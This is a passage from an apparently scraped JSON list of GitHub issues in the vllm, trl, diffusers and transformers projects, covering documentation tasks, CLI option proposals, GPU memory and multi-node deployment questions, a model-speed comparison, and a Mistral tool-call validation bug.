code.\n\nhttps://github.com/vllm-project/vllm/pull/25162 merge after.\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27872", "state": "open", "labels": [ "feature request" ], "created_at": "2025-10-31T09:08:50Z", "updated_at": "2025-12-08T03:32:33Z", "comments": 1, "user": "lengrongfu" }, { "repo": "huggingface/trl", "number": 4413, "title": "What is the default value of num_processes?", "body": "Based on the documentation on page docs/source/grpo_trainer.md, num_processes is used but nowhere does the documentation define what num_processes is or what is its default value.", "url": "https://github.com/huggingface/trl/issues/4413", "state": "closed", "labels": [ "\ud83d\udcda documentation", "\u2753 question", "\ud83c\udfcb GRPO" ], "created_at": "2025-10-31T05:01:23Z", "updated_at": "2025-10-31T17:31:33Z", "user": "thisisraghavkumar" }, { "repo": "huggingface/diffusers", "number": 12564, "title": "[Proposals Welcome] Fal Flashpack integration for faster model loading", "body": "Hey! \ud83d\udc4b\n\nWe've had a request to explore integrating Fal's Flashpack for faster DiT and Text Encoder loading (https://github.com/huggingface/diffusers/issues/12550). Before we jump into implementation, we wanted to open this up to the community to gather ideas and hear from anyone who's experimented with this.\n\nWe'd love your input on:\n1. Performance: Has anyone tried it? What kind of speedups did you see? Are there any performance trade-offs?\n2. Integration Design: How would you approach it if you were to integrating this into Diffusers? Describe your design at a high level - how would we support this in our existing framework and what would the API look like?\n\nWe're looking for proposals and ideas rather than PRs at this stage. We're genuinely interested in hearing different approaches and perspectives from the community on this.\n\nFeel free to share your thoughts!\n", "url": "https://github.com/huggingface/diffusers/issues/12564", "state": "open", "labels": [ "help wanted", "contributions-welcome" ], "created_at": "2025-10-31T02:25:55Z", "updated_at": "2025-10-31T12:26:13Z", "comments": 2, "user": "yiyixuxu" }, { "repo": "vllm-project/vllm", "number": 27832, "title": "[RFC]: Remap `CompilationConfig` from `-O` to `-cc` in CLI", "body": "### Motivation.\n\nWith #20283 (and #26847), we're repurposing `-O0`/`-O1`/`-O2`/`-O3` to map to `optimization_level` instead of `CompilationConfig.level`/`CompilationConfig.mode`. This leaves us in a slightly confusing state where `-O` can refer to optimization level or compilation config depending on what follows it:\n- `-O0` -> `optimization_level=0`\n- `-O 3` -> `optimization_level=3`\n- `-O {\"cudagraph_mode\": \"NONE\"}` -> `CompilationConfig(cudagraph_mode=\"NONE\")`\n- `-O.use_inductor=False` -> `CompilationConfig(use_inductor=False)`\n- `--compilation-config.backend=eager` -> `CompilationConfig(backend=\"eager\")`\n\nThis is bad UX, and we should fix it. However, a CLI shorthand for `CompilationConfig` is still needed so users can easily compose different properties.\n\n### Proposed Change.\n\nWe should create a new shorthand for `CompilationConfig` should be `-cc`. Other options are `-c` and `-C`, but as discussed [here](https://github.com/vllm-project/vllm/pull/26847#discussion_r2439248068), single letters are not \"pythonic\" and capital letters are worse (extra `Shift` keystroke + less pythonic). However, the exact shorthand is up for discussion. React below to cast your vote.\n\nExample changes:\n- `-O0` -> `-O0` (unchanged)\n- `-O 3` -> `-O 3` (unchanged)\n- `-O {\"cudagraph_mode\": \"NONE\"}` -> `-cc {\"cudagraph_mode\": \"NONE\"}`\n- `-O.use_inductor=False` -> `-cc.use_inductor=False`\n- `--compilation-config.backend=eager` -> `--compilation-config.backend=eager` (unchanged)\n\n### Feedback Period.\n\nOne week, 10/30 - 11/5\n\n### CC List.\n\n@hmellor @morrison-turnansky @zou3519\n\n### Any Other Things.\n\nVote for your preferred shorthand:\n- \ud83d\udc4d for `-cc`\n- \ud83d\udc4e for `-O` (keep it the same)\n- \ud83c\udf89 for `-C`\n- \ud83d\ude80 for `-c`\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27832", "state": "closed", "labels": [ "help wanted", "good first issue", "RFC", "torch.compile" ], "created_at": "2025-10-30T20:29:31Z", "updated_at": "2025-11-28T21:51:13Z", "comments": 3, "user": "ProExpertProg" }, { "repo": "huggingface/trl", "number": 4407, "title": "Complete paper index", "body": "These are the papers mentioned at least one in the codebase.\n\n- [ ] https://huggingface.co/papers/1707.06347\n- [x] https://huggingface.co/papers/1909.08593 (only mentioned in notebook, no need to have in paper index)\n- [x] https://huggingface.co/papers/1910.02054 #4551\n- [ ] https://huggingface.co/papers/1910.10683\n- [x] https://huggingface.co/papers/2106.09685 #4441\n- [ ] https://huggingface.co/papers/2211.14275\n- [x] https://huggingface.co/papers/2305.10425 #3990\n- [x] https://huggingface.co/papers/2305.18290 #3937\n- [ ] https://huggingface.co/papers/2306.13649\n- [x] https://huggingface.co/papers/2307.09288 #4094\n- [x] https://huggingface.co/papers/2309.06657 #4441\n- [ ] https://huggingface.co/papers/2309.16240 #3906\n- [x] https://huggingface.co/papers/2310.12036 #3990\n- [ ] https://huggingface.co/papers/2312.00886\n- [x] https://huggingface.co/papers/2312.09244 #4094\n- [ ] https://huggingface.co/papers/2401.08417\n- [x] https://huggingface.co/papers/2402.00856 #3990\n- [x] https://huggingface.co/papers/2402.01306 #4440 \n- [x] https://huggingface.co/papers/2402.03300 #4441\n- [ ] https://huggingface.co/papers/2402.04792\n- [x] https://huggingface.co/papers/2402.05369 #3990\n- [ ] https://huggingface.co/papers/2402.09353\n- [x] https://huggingface.co/papers/2402.14740 #3801\n- [x] https://huggingface.co/papers/2403.00409 #3990\n- [ ] https://huggingface.co/papers/2403.07691\n- [x] https://huggingface.co/papers/2403.17031 (these are implementations details, no need to have in paper index)\n- [x] https://huggingface.co/papers/2404.04656 #3990\n- [ ] https://huggingface.co/papers/2404.09656\n- [ ] https://huggingface.co/papers/2404.19733\n- [x] https://huggingface.co/papers/2405.00675 #3900\n- [ ] https://huggingface.co/papers/2405.14734\n- [ ] https://huggingface.co/papers/2405.16436\n- [ ] https://huggingface.co/papers/2405.21046\n- [x] https://huggingface.co/papers/2406.05882 #3990\n- [x] https://huggingface.co/papers/2406.08414 #3990\n- [ ] https://huggingface.co/papers/2406.11827 #3906\n- [x] https://huggingface.co/papers/2407.21783 (LLaMA 3 paper, no need to have in paper index)\n- [x] https://huggingface.co/papers/2408.06266 #3990\n- [ ] https://huggingface.co/papers/2409.06411 #3906\n- [ ] https://huggingface.co/papers/2409.20370\n- [ ] https://huggingface.co/papers/2411.10442\n- [ ] https://huggingface.co/papers/2501.03262\n- [x] https://huggingface.co/papers/2501.03884 #3824\n- [ ] https://huggingface.co/papers/2501.12599 (Kimi 1.5 paper mentioned in an example, no need to have in paper index)\n- [ ] https://huggingface.co/papers/2501.12948\n- [x] https://huggingface.co/papers/2503.14476 #3937\n- [x] https://huggingface.co/papers/2503.20783 #3937\n- [x] https://huggingface.co/papers/2503.24290 (link to justify beta=0 in the doc, no need to have in paper index)\n- [ ] https://huggingface.co/papers/2505.07291\n- [x] https://huggingface.co/papers/2506.01939 #4580 \n- [x] https://huggingface.co/papers/2507.18071 #3775\n- [x] https://huggingface.co/papers/2508.00180 #3855\n- [x] https://huggingface.co/papers/2508.05629 #4042\n- [x] https://huggingface.co/papers/2508.08221 #3935\n- [x] https://huggingface.co/papers/2508.09726 #3989\n\n\n", "url": "https://github.com/huggingface/trl/issues/4407", "state": "open", "labels": [ "\ud83d\udcda documentation" ], "created_at": "2025-10-30T20:23:26Z", "updated_at": "2025-12-24T05:50:21Z", "comments": 4, "user": "qgallouedec" }, { "repo": "vllm-project/vllm", "number": 27830, "title": "[Usage]: GPS OSS 120b on L40S (Ada)", "body": "### Your current environment\n\n(Just a general question)\n\n\n### How would you like to use vllm\n\nI want to run inference of a GPT OSS 120b with multiple L40S. I read the [docs](https://docs.vllm.ai/projects/recipes/en/latest/OpenAI/GPT-OSS.html) as it clearly says it is not natively supported yet. After I had no success with vLLM it worked plug-and-play with Ollama. My question is, if there is any road map where I can see the progress? Or is it even possible to contribute on that problem? Unfortunately I am not familiar with GPUs. However I need to get it running. Any suggestion is highly appreciated. Even a clear description of the problem and what would be required to solve, is a real advantage. Thank you.\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27830", "state": "closed", "labels": [ "usage" ], "created_at": "2025-10-30T20:07:42Z", "updated_at": "2025-11-17T12:46:43Z", "comments": 6, "user": "Hansehart" }, { "repo": "vllm-project/vllm", "number": 27823, "title": "[Doc]: Multi-node distributed guide issues", "body": "### \ud83d\udcda The doc issue\n\nFor context, see a recent issue (https://github.com/ROCm/ROCm/issues/5567) where a user was trying to set up distributed inference with `ray` by following guidance at https://docs.vllm.ai/en/v0.8.0/serving/distributed_serving.html#running-vllm-on-multiple-nodes. I ran into several issues setting this up on AMD GPUs that I believe might be deficiencies in the vLLM docs:\n\n- The `run_cluster.sh` script passes `--gpus all` which I believe is NVIDIA-only, needed to remove this from the script\n- I had to add `--distributed_executor_backend=\"ray\"` to the `vllm serve` command to get vLLM to use the `ray` cluster that the script sets up\n- I had to set NCCL_SOCKET_IFNAME and GLOO_SOCKET_IFNAME to the appropriate network interfaces, otherwise ran into a NCCL connection error\n- Relevant environment variables (NCCL_SOCKET_IFNAME, GLOO_SOCKET_IFNAME, NCCL_DEBUG) are not propagated to the Docker containers that the script creates; I worked around this by adding them to the `ray` invocation in `run_cluster.sh`, but I don't see a reason why the script shouldn't pass these to the container automatically\n\nI also needed to set `--enforce-eager` but I believe that is an issue specific to our current rocm/vllm Docker images.\n\nFor the above issues I'm not sure which are general gaps in the documentation, which are AMD-specific, and which might have arisen from our Docker images. The image I used and got working was `rocm/vllm:latest` which at the time had vLLM 0.11.\n\n### Suggest a potential alternative/fix\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27823", "state": "open", "labels": [ "documentation" ], "created_at": "2025-10-30T18:33:04Z", "updated_at": "2025-10-30T18:33:04Z", "comments": 0, "user": "schung-amd" }, { "repo": "huggingface/trl", "number": 4399, "title": "Update or remove some of the notebooks", "body": "I suspect these notebooks to be outdated, if so they should be either updated or removed.\n- gpt2-sentiment-control.ipynb\n- best_of_n.ipynb\n- gpt2-sentiment.ipynb", "url": "https://github.com/huggingface/trl/issues/4399", "state": "closed", "labels": [ "\ud83d\udcda documentation" ], "created_at": "2025-10-30T15:34:36Z", "updated_at": "2025-11-04T23:52:50Z", "comments": 0, "user": "qgallouedec" }, { "repo": "huggingface/trl", "number": 4397, "title": "Remove or move Multi Adapter RL", "body": "I don't think this make sense to have this as a whole section in the doc. Either remove it or update and move it to PEFT integration", "url": "https://github.com/huggingface/trl/issues/4397", "state": "closed", "labels": [ "\ud83d\udcda documentation", "\u26a1 PEFT" ], "created_at": "2025-10-30T15:12:58Z", "updated_at": "2025-11-04T23:57:56Z", "comments": 0, "user": "qgallouedec" }, { "repo": "huggingface/transformers", "number": 41948, "title": "Does Qwen2VLImageProcessor treat two consecutive images as one group/feature?", "body": "When looking at Qwen3-VL model's image processor (which uses Qwen2-VL's one), I found the following lines of code hard to understand.\n\n`L296-300` checks the number of input images (`patches.shape[0]`), and repeat the last one to make it divisible by `temporal_patch_size`.\nThis make the model processes two consecutive images as a single feature due to the use of 3DConv with temporal_patch_size=2 by default.\n\nhttps://github.com/huggingface/transformers/blob/76fc50a1527a7db593a6057903b749598f7000a9/src/transformers/models/qwen2_vl/image_processing_qwen2_vl.py#L293-L300\n\nBut as I understand, Qwen2-VL paper mentions that it repeats each input image `temporal_patch_size` times.\nDid I misunderstand the code?.?\n\n\"Image\"\n\n", "url": "https://github.com/huggingface/transformers/issues/41948", "state": "closed", "labels": [], "created_at": "2025-10-30T09:23:50Z", "updated_at": "2025-10-31T01:01:09Z", "comments": 3, "user": "priancho" }, { "repo": "huggingface/transformers", "number": 41947, "title": "why Smolvlm-256M-Instruct slower then Internvl-v2-1B ?", "body": "As title, Smolvlm have smaller model size (1/4 less matrix multiplication), smaller input embedding. But, both torch.CudaEvent, timer.perf_counter with torch.sync report the slower inference time ?\n\nI wonder that does this related with the wrong implementation of Smolvlm in transformers ?\ninference performance comparison : \ninternvl-1B >\ninp_embed : (1, 547, 896)\ntrainable params: 17,596,416 || all params: 647,260,288 || trainable%: 2.7186\n\nsmolvlm-256M >\ninp_embed : (1, 171, 576)\ntrainable params: 9,768,960 || all params: 172,742,976 || trainable%: 5.6552\n\n---\n\nmodel init (all flags turns on, especially flash attention!) :\n```python\n if 'internvl' in self.variant.lower():\n if '3_5' in self.variant:\n self.model = AutoModelForImageTextToText.from_pretrained(self.variant, torch_dtype=torch.bfloat16, low_cpu_mem_usage=True, use_flash_attn=True, trust_remote_code=True)\n # internvl3.5, lm_head is not part of language_model !?\n lm_head = self.model.lm_head\n self.model = self.model.language_model\n self.model.lm_head = lm_head\n else:\n self.model = AutoModel.from_pretrained(\"OpenGVLab/InternVL2-1B\", torch_dtype=torch.bfloat16, low_cpu_mem_usage=True, use_flash_attn=True, trust_remote_code=True)\n self.model = self.model.language_model\n \n try:\n self.model.embed_tokens = self.model.base_model.embed_tokens\n except:\n self.model.embed_tokens = self.model.model.tok_embeddings\n elif 'smolvlm' in self.variant.lower():\n self.model = AutoModelForImageTextToText.from_pretrained(\"HuggingFaceTB/SmolVLM-256M-Instruct\", torch_dtype=torch.bfloat16, _attn_implementation=\"flash_attention_2\", trust_remote_code=True)\n lm_head = self.model.lm_head\n self.model = self.model.model.text_model\n self.model.lm_head = lm_head\n # self.model.embed_tokens already built-in!\n else:\n raise ValueError(f\"Carefull: Variant {self.variant} not tested.\")\n```\n\ncode snippet to measure fps :\n```python\nfor _ in range(30):\n _, _, _ = self.model(model_input)\n print('warm up done!')\n\nprof = Tch_prof(device=self.device)\n#prof = CudaEvent_Tch_prof(device=self.device)\nwith torch.no_grad():\n with prof: \n pred_speed_wps, pred_route, language = self.model(model_input, device=self.device) \n # timer + sync :\n # internvl v2-1b, lang mode : 0.3302s > 330ms ; no-lang mode : 0.0972s > 97ms (10 FPS) ?\n # smolvlm 256m, 0.3974s > 390ms ; no-lang : 0.1 s > 100ms ?\n\n # CudaEvent + sync : \n # internvl v2-1b, no-lang : 82.55ms ?\n # smolvlm 256m > no-lang : 90.68ms ? \n \n print(prof.get_profile())\n\n```\n\ncode snippet for timer classes :\n```python\nclass Tch_prof(object):\n def __init__(self, device):\n self.device = device\n self.hw_type = 'gpu'\n self.tlt_time = {\n 'cpu' : 0,\n 'gpu' : 0\n }\n\n def __enter__(self):\n torch.cuda.current_stream(self.device).synchronize()\n self.s = time.perf_counter() \n \n def __exit__(self, *exc):\n torch.cuda.current_stream(self.device).synchronize()\n self.tlt_time[self.hw_type] += time.perf_counter() - self.s\n \n def get_profile(self, hw_type='all'):\n if hw_type == 'all':\n return self.tlt_time\n elif hw_type in self.tlt_time.keys():\n return self.tlt_time[hw_type]\n else:\n raise RuntimeError(f\"No such hardware type {hw_type}\") \n\n\nclass CudaEvent_Tch_prof(object):\n def __init__(self, device):\n self.device = device\n self.start = torch.cuda.Event(enable_timing=True)\n self.end = torch.cuda.Event(enable_timing=True)\n\n def __enter__(self):\n self.start.record()\n \n def __exit__(self, *exc):\n self.end.record()\n torch.cuda.current_stream(self.device).synchronize()\n self.tlt_time = self.start.elapsed_time(self.end) \n \n def get_profile(self):\n return self.tlt_time \n```\n\nAny suggestion will be helpful !!", "url": "https://github.com/huggingface/transformers/issues/41947", "state": "closed", "labels": [], "created_at": "2025-10-30T08:10:28Z", "updated_at": "2025-10-31T11:47:44Z", "comments": 4, "user": "HuangChiEn" }, { "repo": "huggingface/trl", "number": 4386, "title": "Reference supported trainers in Liger Kernel integration guide", "body": "Currently, we only have an example with SFT, and it's hard to know which trainer supports liger. We should list the trainer which support liger.", "url": "https://github.com/huggingface/trl/issues/4386", "state": "closed", "labels": [ "\ud83d\udcda documentation", "\ud83c\udfcb SFT" ], "created_at": "2025-10-30T04:08:04Z", "updated_at": "2025-11-03T18:16:04Z", "comments": 0, "user": "qgallouedec" }, { "repo": "huggingface/trl", "number": 4385, "title": "Use a common 'trl-lib` namespace for the models/datasets/spaces", "body": "In the doc, we have examples using different namespaces, like `kashif/stack-llama-2`, `edbeeching/gpt-neo-125M-imdb` etc. we should unify all these examples to use a common `trl-lib` namespace.", "url": "https://github.com/huggingface/trl/issues/4385", "state": "open", "labels": [ "\ud83d\udcda documentation", "\u2728 enhancement" ], "created_at": "2025-10-30T04:04:10Z", "updated_at": "2025-10-30T04:04:38Z", "comments": 0, "user": "qgallouedec" }, { "repo": "huggingface/trl", "number": 4384, "title": "Write the subsection \"Multi-Node Training\"", "body": "This section must be written, with a simple code example, and a link to the `accelerate` documentation", "url": "https://github.com/huggingface/trl/issues/4384", "state": "open", "labels": [ "\ud83d\udcda documentation", "\u26a1accelerate" ], "created_at": "2025-10-30T03:57:53Z", "updated_at": "2025-12-08T16:23:23Z", "comments": 2, "user": "qgallouedec" }, { "repo": "huggingface/trl", "number": 4383, "title": "Add PEFT subsection to \"Reducing Memory Usage\"", "body": "PEFT is a major technique to reduce memory usage of the training. We should have a small section pointing to the PEFT integration guide", "url": "https://github.com/huggingface/trl/issues/4383", "state": "closed", "labels": [ "\ud83d\udcda documentation", "\u2728 enhancement", "\u26a1 PEFT" ], "created_at": "2025-10-30T03:55:55Z", "updated_at": "2025-11-07T00:03:01Z", "comments": 0, "user": "qgallouedec" }, { "repo": "huggingface/trl", "number": 4382, "title": "Populate \"Speeding Up Training\"", "body": "Currently, this section only mentions vLLM. We should have a small guide for other methods, like flash attention.\nIdeally, to avoid repetition, we should have a very light example, and a link to the place in the doc where it's more extensively discussed, example vLLM pointing to vLLM integration guide", "url": "https://github.com/huggingface/trl/issues/4382", "state": "closed", "labels": [ "\ud83d\udcda documentation", "\u26a1accelerate" ], "created_at": "2025-10-30T03:54:34Z", "updated_at": "2025-12-01T09:47:23Z", "comments": 0, "user": "qgallouedec" }, { "repo": "huggingface/trl", "number": 4380, "title": "Fully transition from `flash-attn` to `kernels`", "body": "The new recommended way to use flash attention is to use kernels. We should update our tests, and documentation to use `kernels` instead of \"flash_attention2\". Eg\n\nhttps://github.com/huggingface/trl/blob/1eb561c3e9133892a2e907d84123b46e40cbc5a0/docs/source/reducing_memory_usage.md#L149\n\n```diff\n- training_args = DPOConfig(..., padding_free=True, model_init_kwargs={\"attn_implementation\": \"flash_attention_2\"}) \n+ training_args = DPOConfig(..., padding_free=True, model_init_kwargs={\"attn_implementation\": \"kernels-community/flash-attn2\"}) \n```", "url": "https://github.com/huggingface/trl/issues/4380", "state": "closed", "labels": [ "\ud83d\udcda documentation", "\u2728 enhancement" ], "created_at": "2025-10-30T03:46:07Z", "updated_at": "2025-11-13T04:07:35Z", "comments": 0, "user": "qgallouedec" }, { "repo": "huggingface/trl", "number": 4379, "title": "Remove or populate \"Training customization\"", "body": "Currently, this part of the documentation shows some possible customizations that applies to all trainers https://huggingface.co/docs/trl/main/en/customization\n\nHowever, it only features a few examples. This sections would make sense if it gets populated with other customizations, or removed. This thread can be used to discussed additional customizations", "url": "https://github.com/huggingface/trl/issues/4379", "state": "closed", "labels": [ "\ud83d\udcda documentation" ], "created_at": "2025-10-30T03:41:02Z", "updated_at": "2025-12-01T09:39:09Z", "comments": 0, "user": "qgallouedec" }, { "repo": "huggingface/trl", "number": 4378, "title": "Extend basic usage example to all supported CLIs", "body": "currently https://huggingface.co/docs/trl/main/en/clis?command_line=Reward#basic-usage shows only basic example usage for SFT, DPO and Reward. We should have it for all supported CLIs (ie, GRPO, RLOO, KTO)", "url": "https://github.com/huggingface/trl/issues/4378", "state": "closed", "labels": [ "\ud83d\udcda documentation", "\ud83c\udfcb KTO", "\ud83c\udfcb RLOO", "\ud83d\udcf1 cli", "\ud83c\udfcb GRPO" ], "created_at": "2025-10-30T03:35:36Z", "updated_at": "2025-11-14T01:13:17Z", "comments": 0, "user": "qgallouedec" }, { "repo": "vllm-project/vllm", "number": 27783, "title": "[Usage]: Model performance different from api", "body": "### Your current environment\n\n```text\nvllm==0.10.0\n```\n\n\n### How would you like to use vllm\n\nI'm running model Qwen3-8B with vllm. I also run the same experiment using Qwen3-8B api. But I find the result is quite different, the accuracy of api-model on my task is much higher than the vllm-model. I use the same temperature and top_k. \n\nIs there anyone else meeting the same question (the api-model is stronger than the vllm-model)?\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27783", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-30T03:30:02Z", "updated_at": "2025-10-30T03:30:02Z", "comments": 0, "user": "fny21" }, { "repo": "vllm-project/vllm", "number": 27782, "title": "[Usage]: The same configuration v0.11.0 will report insufficient video memory compared to v0.8.5", "body": "### Your current environment\n\n```text\nThe output of `python collect_env.py`\n```\n\n\n### How would you like to use vllm\n\nThe server is a 4090 with 4 cards\nDocker runs vllm openai: v0.8.5 deployment command: \"command: --model /models/Qwen3/Qwen3-30B-A3B --enable-reasoning --reasoning-parser deepseek_r1 --tensor_parallel_size 4\" Can be deployed and started normally, switch the image version to v0.11.0, and run the command \"command: --model /models/Qwen3/Qwen3-30B-A3B --reasoning-parser deepseek_r1 --tensor_parallel_size 4\" It will report that the graphics card memory is insufficient, and the error log is:\nCapturing CUDA graphs (mixed prefill-decode, PIECEWISE): 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 67/67 [00:19<00:00, 3.43it/s]\nCapturing CUDA graphs (decode, FULL): 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 35/35 [00:07<00:00, 4.78it/s]\nvllm | (Worker_TP3 pid=263) INFO 10-29 19:57:20 [gpu_model_runner.py:3480] Graph capturing finished in 28 secs, took 1.88 GiB\nvllm | (Worker_TP1 pid=261) INFO 10-29 19:57:20 [gpu_model_runner.py:3480] Graph capturing finished in 28 secs, took 1.88 GiB\nvllm | (Worker_TP0 pid=260) INFO 10-29 19:57:20 [gpu_model_runner.py:3480] Graph capturing finished in 28 secs, took 1.88 GiB\nvllm | (Worker_TP2 pid=262) INFO 10-29 19:57:20 [gpu_model_runner.py:3480] Graph capturing finished in 28 secs, took 1.88 GiB\nvllm | (Worker_TP2 pid=262) ERROR 10-29 19:57:21 [multiproc_executor.py:671] WorkerProc hit an exception.\nvllm | (Worker_TP2 pid=262) ERROR 10-29 19:57:21 [multiproc_executor.py:671] Traceback (most recent call last):\nvllm | (Worker_TP2 pid=262) ERROR 10-29 19:57:21 [multiproc_executor.py:671] File \"/usr/local/lib/python3.12/dist-packages/vllm/v1/worker/gpu_model_runner.py\", line 3217, in _dummy_sampler_run\nvllm | (Worker_TP2 pid=262) ERROR 10-29 19:57:21 [multiproc_executor.py:671] sampler_output = self.sampler(logits=logits,\nvllm | (Worker_TP2 pid=262) ERROR 10-29 19:57:21 [multiproc_executor.py:671] ^^^^^^^^^^^^^^^^^^^^^^^^^^^\nvllm | (Worker_TP2 pid=262) ERROR 10-29 19:57:21 [multiproc_executor.py:671] File \"/usr/local/lib/python3.12/dist-packages/torch/nn/modules/module.py\", line 1773, in _wrapped_call_impl\nvllm | (Worker_TP2 pid=262) ERROR 10-29 19:57:21 [multiproc_executor.py:671] return self._call_impl(*args, **kwargs)\nvllm | (Worker_TP2 pid=262) ERROR 10-29 19:57:21 [multiproc_executor.py:671] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\nvllm | (Worker_TP2 pid=262) ERROR 10-29 19:57:21 [multiproc_executor.py:671] File \"/usr/local/lib/python3.12/dist-packages/torch/nn/modules/module.py\", line 1784, in _call_impl\nvllm | (Worker_TP2 pid=262) ERROR 10-29 19:57:21 [multiproc_executor.py:671] return forward_call(*args, **kwargs)\nvllm | (Worker_TP2 pid=262) ERROR 10-29 19:57:21 [multiproc_executor.py:671] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\nvllm | (Worker_TP2 pid=262) ERROR 10-29 19:57:21 [multiproc_executor.py:671] File \"/usr/local/lib/python3.12/dist-packages/vllm/v1/sample/sampler.py\", line 100, in forward\nvllm | (Worker_TP2 pid=262) ERROR 10-29 19:57:21 [multiproc_executor.py:671] sampled, processed_logprobs = self.sample(logits, sampling_metadata)\nvllm | (Worker_TP2 pid=262) ERROR 10-29 19:57:21 [multiproc_executor.py:671] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\nvllm | (Worker_TP2 pid=262) ERROR 10-29 19:57:21 [multiproc_executor.py:671] File \"/usr/local/lib/python3.12/dist-packages/vllm/v1/sample/sampler.py\", line 180, in sample\nvllm | (Worker_TP2 pid=262) ERROR 10-29 19:57:21 [multiproc_executor.py:671] random_sampled, processed_logprobs = self.topk_topp_sampler(\nvllm | (Worker_TP2 pid=262) ERROR 10-29 19:57:21 [multiproc_executor.py:671] ^^^^^^^^^^^^^^^^^^^^^^^\nvllm | (Worker_TP2 pid=262) ERROR 10-29 19:57:21 [multiproc_executor.py:671] File \"/usr/local/lib/python3.12/dist-packages/torch/nn/modules/module.py\", line 1773, in _wrapped_call_impl\nvllm | (Worker_TP2 pid=262) ERROR 10-29 19:57:21 [multiproc_executor.py:671] return self._call_impl(*args, **kwargs)\nvllm | (Worker_TP2 pid=262) ERROR 10-29 19:57:21 [multiproc_executor.py:671] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\nvllm | (Worker_TP2 pid=262) ERROR 10-29 19:57:21 [multiproc_executor.py:671] File \"/usr/local/lib/python3.12/dist-packages/torch/nn/modules/module.py\", line 1784, in _call_impl\nvllm | (Worker_TP2 pid=262) ERROR 10-29 19:57:21 [multiproc_executor.py:671] return forward_call(*args, **kwargs)\nvllm | (Worker_TP2 pid=262) ERROR 10-29 19:57:21 [multiproc_executor.py:671] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\nvllm | (Worker_TP2 pid=262) ERROR 10-29 19:57:21 [multiproc_executor.py:671] File \"/usr/local/lib/python3.12/dist-packages/vllm/v1/sample/ops/topk_topp_sampler.py\", line 122, in forward_cuda\nvllm | (Worker", "url": "https://github.com/vllm-project/vllm/issues/27782", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-30T03:24:54Z", "updated_at": "2025-11-06T06:53:15Z", "comments": 2, "user": "lan-qh" }, { "repo": "huggingface/trl", "number": 4376, "title": "Rewrite `peft_integration.md`", "body": "This section of the documentation is widely outdated and rely only on PPO.\n\nIdeally, we should have a clear documentation that shows how to use peft with SFT, DPO and GRPO at least, via the `peft_config` argument. We could have additional subsection about QLoRA and prompt-tuning.", "url": "https://github.com/huggingface/trl/issues/4376", "state": "closed", "labels": [], "created_at": "2025-10-30T03:23:24Z", "updated_at": "2025-11-24T10:39:27Z", "comments": 0, "user": "qgallouedec" }, { "repo": "vllm-project/vllm", "number": 27778, "title": "[Usage]: Is DP + PP a possible way to use vLLM?", "body": "### Your current environment\n\n```text\nThe output of `python collect_env.py`\n```\n\n\n### How would you like to use vllm\n\nHi there, I wonder if we can adopt DP + PP in vLLM to form a heterogeneous inference pipeline. For example, If i have two V100 32G GPUs and one A100 80G GPU, can I utilize them in pipeline parallelism with vLLM? I might use V100 as the first stage, and A100 as the second. \nConsider that V100's compute ability is lower than A100, this would result in unbalance, and the V100 stage becomes a bottleneck. Thus I would like to use two V100s in DP at the first PP stage.\nIs this possible with the current released vLLM version?\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27778", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-30T02:05:06Z", "updated_at": "2025-10-30T02:05:06Z", "comments": 0, "user": "oldcpple" }, { "repo": "vllm-project/vllm", "number": 27746, "title": "[Bug]: `strict` value in function definitions causes request error when using Mistral tokenizer", "body": "### Your current environment\n\nTested with latest vllm source build from main\n\n### \ud83d\udc1b Describe the bug\n\nStart vLLM with a model that uses the mistral tokenizer:\n\n```\nvllm serve mistralai/Mistral-Small-24B-Instruct-2501 \\\n --enable-auto-tool-choice \\\n --tool-call-parser mistral \\\n --tokenizer-mode mistral\n```\n\nSend a simple tool call request with the `strict` parameter set to a value of `False`:\n\n```python\nfrom openai import OpenAI\n\nclient = OpenAI(base_url=\"http://localhost:8000/v1\", api_key=\"fake\")\n\ntools = [\n {\n \"type\": \"function\",\n \"function\": {\n \"name\": \"get_current_time\",\n \"description\": \"Get the current time in UTC\",\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": {},\n \"required\": []\n },\n \"strict\": False,\n }\n },\n]\nmodel = client.models.list().data[0].id\nresponse = client.chat.completions.create(\n model=model,\n messages=[{\"role\": \"user\", \"content\": \"What is the current time?\"}],\n tools=tools,\n)\nprint(\"Success!\")\n```\n\nThe request fails with a 400 error like:\n\n`openai.BadRequestError: Error code: 400 - {'error': {'message': '1 validation error for Tool\\nfunction.strict\\n Extra inputs are not permitted [type=extra_forbidden, input_value=False, input_type=bool]\\n For further information visit https://errors.pydantic.dev/2.12/v/extra_forbidden 1 validation error for Tool\\nfunction.strict\\n Extra inputs are not 